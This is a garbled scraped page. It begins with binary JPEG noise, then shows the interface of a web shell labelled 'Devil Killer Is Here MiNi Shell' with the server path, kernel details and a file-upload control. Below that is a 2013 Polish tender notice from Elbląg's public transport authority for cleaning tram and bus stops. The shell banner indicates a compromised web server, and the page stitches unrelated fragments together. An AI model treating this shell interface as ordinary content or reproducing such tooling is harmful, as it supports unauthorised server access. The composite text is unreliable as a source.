JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130213/58834-N-2013.html

<p class="kh_header"><b>Elbląg: Całoroczne oczyszczanie przystanków tramwajowych, przystanków autobusowych i pętli autobusowych komunikacji miejskiej w Elblągu wraz z utrzymaniem infrastruktury przystankowej oraz  odbiór i wywóz odpadów komunalnych zebranych z pojemników na odpady i zlokalizowanych na przystankach.</b><br>
<b>Numer ogłoszenia: 58834 - 2013; data zamieszczenia: 13.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Komunikacji Miejskiej  w Elblągu Sp. z o.o. , ul. Browarna 90, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. (055) 230-79-00, faks (055) 234-79-01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zkm.elblag.com.pl,</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z ograniczoną odpowiedzialnością.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Całoroczne oczyszczanie przystanków tramwajowych, przystanków autobusowych i pętli autobusowych komunikacji miejskiej w Elblągu wraz z utrzymaniem infrastruktury przystankowej oraz  odbiór i wywóz odpadów komunalnych zebranych z pojemników na odpady i zlokalizowanych na przystankach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest całoroczne oczyszczanie przystanków tramwajowych, przystanków autobusowych i pętli autobusowych komunikacji miejskiej w Elblągu wraz z utrzymaniem infrastruktury przystankowej oraz  odbiór i wywóz odpadów komunalnych zebranych z pojemników 
na odpady i zlokalizowanych na przystankach. 
2.Zakres zamówienia obejmuje
2.1 Przystanki tramwajowe zlokalizowane są w ciągu układu komunikacji tramwajowej. Przystanki usytuowane przy torach, jako powierzchnie wydzielone  perony oraz w ciągach chodnikowych (poza jezdnią) oznaczone znakiem informacyjnym  D17 na słupku lub na attyce wiaty. 
Powierzchnia  utrzymania obejmuje teren przystanku wraz z opaską lub krawężnikiem ulicznym  przylegający do przystanku lub wysepki na całej jej długości oraz wnętrze wiaty i teren dookoła niej. 
Wykaz lokalizacji, harmonogram (częstotliwość) utrzymania przystanków tramwajowych w ilości 70 szt. o łącznej powierzchni 5.740,02 m2 , stanowi Załącznik Nr 1 do wzoru umowy.
Wykaz lokalizacji, harmonogram (częstotliwość)  do utrzymania zimowego przystanków tramwajowych w ilości 71 szt. o łącznej powierzchni 5.872,82 m2 stanowi Załącznik Nr 4 do wzoru umowy.
2.2 Przystanki autobusowe zlokalizowane są w ciągach chodnikowych ulic miasta. Oznaczone są znakiem drogowym D15 na słupku lub na attyce wiaty. 
Powierzchnia utrzymania obejmuje teren przystanku wraz z krawężnikiem ulicznym przylegającym do przystanku na całej długości oraz wnętrze wiaty i teren dookoła niej. 
Wykaz lokalizacji, harmonogram (częstotliwość) utrzymania przystanków autobusowych w ilości 167 szt. o łącznej powierzchni 5.788,00 m2,  stanowi Załącznik Nr 2 do wzoru umowy.
Wykaz lokalizacji, harmonogram (częstotliwość) do utrzymania zimowego przystanków autobusowych w ilości 210 szt. o łącznej powierzchni 6480,00 m2 , stanowi Załącznik Nr 5 do wzoru umowy. 
2.3 Pętle autobusowe stanowią wyodrębnione tereny dla postoju lub zawracania autobusów. 
Wykaz lokalizacji, harmonogram (częstotliwość)  do utrzymania pętli autobusowych 
w ilości 10 szt. o łącznej powierzchni 5464,00 m2  stanowi Załącznik Nr  3 do wzoru umowy. 
Wykaz lokalizacji, harmonogram (częstotliwość) do utrzymania zimowego pętli autobusowych w ilości 10 szt. o łącznej powierzchni 2500,00 m2 stanowi Załącznik Nr  6 do wzoru umowy.
2.4 Infrastruktura przystankowa:
a) wiaty przystankowe  (zakres zamówienia obejmuje ściany wewnątrz i zewnątrz wiaty,  ławkę, tablicę przystankową i tablice rozkładowe) w ilości 87 szt. o powierzchni łącznej 1548,30 m2. Wykaz wiat i ich lokalizacje  stanowi Załącznik Nr  7 do wzoru umowy,
b) dachy wiat przystankowych (zakres zamówienia obejmuje powierzchnię wewnętrzną i zewnętrzną) w ilości 100 szt. o powierzchni łącznej 986,70 m2. Wykaz dachów i ich lokalizacje stanowi Załącznik Nr  8 do wzoru umowy,
c) osłony przeciwbryzgowe (zakres zamówienia obejmuje powierzchnię wewnętrzną 
i zewnętrzną osłon), w ilości 11 szt. o powierzchni łącznej 764,90 m2. Wykaz osłon 
i ich lokalizację stanowi Załącznik Nr  9 do wzoru umowy,
d) pawilony  (zakres zamówienia obejmuje ściany zewnętrzne) w ilości 3 szt.
o powierzchni łącznej 134,59 m2. Wykaz pawilonów i ich lokalizację stanowi Załącznik Nr  10 do wzoru umowy,
2.5 Pojemniki na odpady w ilości 126 szt. o pojemności 50 l każdy, w tym
a) zlokalizowane na przystankach tramwajowych w ilości 34 szt.,
b) zlokalizowane na przystankach  autobusowych w ilości 92 szt..
Pojemniki stanowią własność ZKM Spółka z o.o.	
Opróżnianie pojemników na odpady odbywać się będzie jeden raz w tygodniu. 
Wykaz pojemników i ich lokalizację zamieszczono w Załączniku Nr 11 i 12  do wzoru umowy.
3. Wymagania i warunki wykonania.
3.1 Szczegółowe wymagania dotyczące utrzymania w czystości przystanków tramwajowych, przystanków autobusowych i pętli autobusowych (bez niedziel i świąt) w dni, w których nie występują opady śniegu lub gołoledzi: 
a) sprzątanie całej powierzchni przystanków tramwajowych (przed i za ogrodzeniem), przystanków autobusowych, pętli autobusowych, z odpadów, a w szczególności  piasku, papierów, niedopałków,  odpadów organicznych, stłuczki szklanej, zgrabianie opadłych liści z drzew i krzewów, niedopuszczenie do ich  zachwaszczenia oraz wywóz zebranych  odpadów.
b) zakres prac uzależniony będzie od istniejących warunków atmosferycznych. Prace  będą wykonywane wg harmonogramu (Załączniki do wzoru umowy Nr 1,2,3). W przypadku zmiany warunków    atmosferycznych powodujących, że wykonanie usługi staje się niemożliwe (np. opady śniegu, gołoledź), Wykonawca podejmie czynności zgodne 
z wymaganiami dla okresu zimowego, 
c) Wykonawca zobowiązany będzie do sprzątania przystanków tramwajowych, autobusowych i pętli autobusowych z częstotliwością gwarantującą ich należyty stan sanitarno porządkowy w godzinach porannych, zgodnie z załączonymi do wzoru umowy harmonogramami.
3.2 Szczegółowe wymagania dotyczące utrzymania przystanków w okresie zimowym (z opadami śniegu lub gołoledzią):
a) zimowe utrzymanie przystanków tramwajowych, przystanków autobusowych  i pętli autobusowych polega na usuwaniu śniegu, błota pośniegowego, ubitej przymarzniętej do nawierzchni warstwy lodu oraz posypywaniu piaskiem lub materiałem niwelującym śliskość powierzchni, których dotyczy  zakres zamówienia przy równoczesnym lub osobnym wystąpieniu czynników pogodowych  jak: opadów śniegu, gołoledzi, zawiei itp., 
b) uprzątnięte błoto, śnieg, lód należy pryzmować przy krawędzi chodnika. Pryzmy muszą być oddalone minimum 1 m od pni drzew i nie mogą utrudniać ruchu pieszych oraz ograniczać dostępu do pojazdów komunikacji miejskiej,
c) rozpoczęcie i zakończenie zimowego utrzymania będzie uzależnione od warunków atmosferycznych i decyzji Zamawiającego. Dzień rozpoczęcia i zakończenia okresu zimowego zostanie podany przez Zamawiającego i uzgodniony z Wykonawcą telefonicznie i pisemnie,
d) rozpoczęcie zimowego utrzymania winno nastąpić w ciągu 3 godzin od chwili uruchomienia tzw. (Akcji Zima) przez Zamawiającego, 
e) Wykonawca rozpoczyna akcję związaną z odśnieżaniem nie później niż w ciągu dwóch godzin po ustaniu opadów śniegu, 
f) Zamawiający zastrzega sobie prawo wskazywania Wykonawcy kolejności utrzymania i odśnieżania niektórych przystanków,
g) zakres prac uzależniony będzie od istniejących warunków atmosferycznych. 
W przypadku braku czynników pogodowych warunkujących zimowe utrzymanie Wykonawca podejmie czynności  określone w pkt.3.1 wg harmonogramu określonego w Załącznikach Nr 1,2,3 do wzoru umowy.  
3.3 Szczegółowe wymagania dotyczące utrzymania w czystości infrastruktury przystankowej  komunikacji miejskiej na terenie miasta Elbląga.
a) kosmetyczna konserwacja polega na myciu ręcznym lub myciu przy użyciu sprzętu mechanicznego przeznaczonego do mycia graffiti i innych zabrudzeń oraz usuwaniu plakatów, ogłoszeń, ogłoszeń reklamowych, wywieszek, których umieszczenie nie było uzgodnione z Zamawiającym. 
b) kosmetyczna konserwacja wiat przystankowych  komunikacji miejskiej od kwietnia do listopada raz  w miesiącu (ostatnia dekada każdego miesiąca) lub według pisemnej dyspozycji Zamawiającego wymienionych w Załączniku Nr 7 do umowy.
c) kosmetyczna konserwacja dachów wiat przystankowych komunikacji miejskiej  (oczyszczanie powierzchni dachów, rynien i rur spustowych wiat z liści i gałęzi, nieczystości itp.) wiosną, latem według pisemnej dyspozycji Zamawiającego wymienionych w Załączniku Nr 8 do umowy, 
d) kosmetyczna konserwacja osłon przeciw bryzgowych raz na kwartał, wiosna, lato, jesień, według pisemnej dyspozycji Zamawiającego wymienionych w Załączniku Nr 9 do umowy,
e) kosmetyczna konserwacja pawilonów ZKM jeden raz w roku - w okresie wiosennym według pisemnej dyspozycji Zamawiającego  wymienionych w Załączniku Nr 10 do umowy.
3.4 Szczegółowe wymagania dotyczące pojemników na  odpady obejmują:
a) opróżnianie (przez opróżnianie ich zawartości) jeden raz w tygodniu, w godzinach wczesnoporannych, tak aby w każdej chwili istniała możliwość składowania w nich odpadów,
b) Zamawiający przekaże protokołem pojemniki na  odpady wybranemu Wykonawcy, 
c) po każdorazowym opróżnianiu pojemników na odpady należy uprzątnąć  powierzchnię pod pojemnikiem i w jego bezpośredniej bliskości,
d) opróżnione pojemniki zostaną  uzupełnione w worki foliowe na odpady,
e) Wykonawca odbierający odpady komunalne zobowiązany jest do zapewnienia właściwego stanu sanitarnego pojemników do zbierania odpadów, w tym okresowego mycia i dezynfekcji, minimum raz na kwartał, w terminie uzgodnionym 
z Zamawiającym,
f) do Wykonawcy będzie należało mocowanie  pojemników (zerwanych ze słupków, lub nowych) w porozumieniu z Zamawiającym,
g) Wykonawca będzie informował Zamawiającego o zniszczeniu lub kradzieży pojemników, w celu zdjęcia z ewidencji i zakupu nowych pojemników przez Zamawiającego,
h) w uzasadnionych przypadkach po zgłoszeniu przez Zamawiającego pojemniki muszą zostać dodatkowo oczyszczone w ciągu dnia, 
i) wykaz  pojemników i ich lokalizację zamieszczono w Załączniku Nr 11 i 12  
do niniejszej umowy,
j) Wykonawca zobowiązany jest do przeprowadzenia wizji lokalnej w zakresie rozmieszczenia pojemników na  odpady celem ułożenia harmonogramu opróżniania 
i wywozu odpadów komunalnych oraz przedstawienie harmonogramu Zamawiającemu do akceptacji. 
4. Zamawiający zaleca, aby Wykonawca przeprowadził wizję lokalną miejsca usługi będącej przedmiotem zamówienia w celu uzyskania informacji, które są lub mogą być konieczne 
do przygotowania oferty, a następnie zawarcia umowy i wykonania zamówienia. Koszt wizji lokalnej ponosi Wykonawca.
5. Wykonywanie usług należy przeprowadzać w sposób nie  kolidujący z ruchem pieszym 
i nie ograniczających dostępu do pojazdów komunikacji miejskiej.
6. Wykonanie usług należy niezwłocznie, jednak nie później niż w godzinach rannych następnego dnia roboczego zgłosić Zamawiającemu, celem umożliwienia sprawdzenia jakości wykonania i sporządzenia protokółu odbioru.
7. Wykonawca we własnym zakresie zobowiązany jest do zabezpieczenia i oznakowania bezpośredniego miejsca pracy.
8. Wykonawca zobowiązany jest do zapewnienia odpowiedniej ilości osób do realizacji przedmiotu zamówienia. 
9. Wykonawca wykona umowę z użyciem własnego sprzętu, materiałów i narzędzi gwarantujących należytą  staranność.
10. Wykonawca zapewnia należytą jakość świadczonych usług i  ponosi pełną odpowiedzialność za ich wykonanie wobec Zamawiającego oraz służb sanitarno -porządkowych miasta .
11. Do usuwania odpadów z przystanków i pętli dopuszcza się używanie sprzętu mechanicznego.
12. Do utrzymania przystanków tramwajowych i autobusowych  należy używać sprzętu lekkiego, którego masa całkowita wraz z osprzętem nie może przekroczyć dwóch ton.
13. Wprowadzanie ciężkiego sprzętu na przystanki przystosowane do ruchu pieszego 
jest niedopuszczalne.
14. Do całorocznego utrzymania pętli autobusowych, można użyć sprzętu, którego masa całkowita wraz z osprzętem może przekroczyć dwie tony.
15. Wykonawca zobowiązuje się realizować usługę zgodnie z aktualnie obowiązującymi przepisami sanitarnymi, ochrony środowiska oraz określającymi zasady stosowania środków chemicznych na ulicach i innych drogach publicznych.
16. Materiały niwelujące śliskość muszą posiadać pozytywną opinię wydaną przez Instytut Badawczy Dróg i Mostów w Warszawie lub Państwowy Zakład Higieny.
17. Materiał użyty do niwelowania śliskości nie może zawierać zanieczyszczeń ilastych, gliniastych i innych, które na mokrej nawierzchni powodują zwiększenie możliwości poślizgu  i niszczą środowisko.
18. Wykonawca będzie ponosić pełną odpowiedzialność za ewentualne szkody wynikłe wobec Zamawiającego i osób trzecich spowodowane wykonywaniem przedmiotu zamówienia.
19. Wykonawca poniesie koszty napraw lub wymiany elementów pasa drogowego oraz infrastruktury przystankowej uszkodzonych lub zniszczonych w wyniku wykonywanych prac. 
20. Wykonawca wyposaży pojazdy w urządzenia zgodnie z Rozporządzeniem Ministra Transportu i Infrastruktury z dnia 31 grudnia 2002r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. z 2003r. Nr 32, poz. 262 z późn. zm.) wydanego na podstawie art.66 ust.5 ustawy  z dnia 20 czerwca 1997r. prawo o ruchu drogowym  ( Dz.U. Nr 98, poz.602 z póź. zm.).
21. Na Wykonawcy ciążą wszystkie obowiązki wynikające z: 
a) ustawy z dnia 14 grudnia 2012 r. o odpadach ((Dz. U. z 2013 r. poz. 21),
b) ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach  (tekst jednolity Dz.U. z 2012 poz. 391) 
c) ustawy z dnia 27.04.2001 r. - Prawo ochrony środowiska (Dz. U. z 2008 r. Nr 25, poz. 150, z późn. zm.)
d) obowiązującego Regulaminu utrzymania czystości i porządku na terenie Gminy Miasta Elbląg. 
22. Wykonawca musi być zarejestrowany w rejestrze działalności regulowanej, o którym mowa w art.9b ustawy z dnia13 września 1996r. o utrzymaniu i porządku w gminach (t.j. z dnia 17 lutego 2012r. Dz.U. z 2012r. poz. 391)  w zakresie odbierania odpadów komunalnych lub posiadać umowę z podmiotem  zarejestrowanym w rejestrze działalności regulowanej  w zakresie odbierania odpadów komunalnych.
23. W trakcie realizacji umowy, Wykonawca jest zobowiązany do przekazywania kserokopii karty przekazania odpadów Zamawiającemu potwierdzającej przyjęcie odpadów na składowisko odpadów   lub w inne miejsce zgodne z Ustawą o odpadach.
24.Przewiduje się możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
24.1. Wynagrodzenie w przypadku:
a) urzędowych zmian w obowiązujących przepisach podatkowych, w tym zmiany stawek podatku VAT,
b) przejmowania lub ustawiania przez Zamawiającego wiat przystankowych oraz modernizacji lub budowy peronów, przystanków powodujących zmianę ich ilości,
c) wyłączenia z ruchu przystanków w wyniku prowadzonych prac remontowych 
lub budowlanych .
24.2. Terminu  realizacji umowy pod warunkiem:
a) działania siły wyższej (np. klęski żywiołowe) mające bezpośredni wpływ 
na terminowość wykonywanych prac,
b) wystąpienia okoliczności, których strony nie były w stanie przewidzieć, pomimo zachowania należytej staranności,
c) wystąpienia awarii nie zawinionej przez Wykonawcę,
d) działania osób trzecich lub organów władzy publicznej, które spowodują przerwanie lub czasowe zawieszenie realizacji zamówienia.
24.3. W przypadku wystąpienia okoliczności o których mowa  w ppkt.21.2, litery: a, b, c, d.   ustalone zostaną nowe terminy realizacji.
24.4. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, w formie aneksu do umowy.
24.5. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ust. 1 ustawy Prawo zamówień publicznych.
25. Zamawiający nie zastrzega w SIWZ, że część lub całość zamówienia nie może być powierzona podwykonawcy. Zamawiający żąda wskazania przez Wykonawcę w ofercie, którą część zamówienia powierza podwykonawcy.
26. Zamawiający informuje, że nie przewiduje udzielenia zamówień uzupełniających.
27. Zamawiający informuje, że nie przewiduje zaliczek na poczet wykonania zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.61.00.00-6, 90.62.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości: 2.500,- zł 
(słownie: dwa tysiące pięćset złotych)
Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub w kilku następujących formach, zgodnie z art. 45 ustawy Prawo zamówień publicznych tj.:
w pieniądzu,
w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
w gwarancjach bankowych, 
w gwarancjach ubezpieczeniowych, 
w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
BANK PEKAO S.A. II O/ELBLĄG Nr 16 1240 2265 1111 0000 3237 1826
Wadium wnoszone w innej formie niż w pieniądzu (oryginał dokumentu) należy zdeponować w  Kasie Zarządu Komunikacji Miejskiej  w Elblągu spółka z ograniczoną odpowiedzialnością  przy  ul. Browarna 90 w Elblągu.
2.Wykonawca, który nie wniesie wadium na okres związania ofertą zostanie przez Zamawiającego wykluczony z postępowania.
3.Wadium będzie zwracane na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.
4.Zamawiający zatrzyma wadium na warunkach określonych w art. 46 ustawy Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
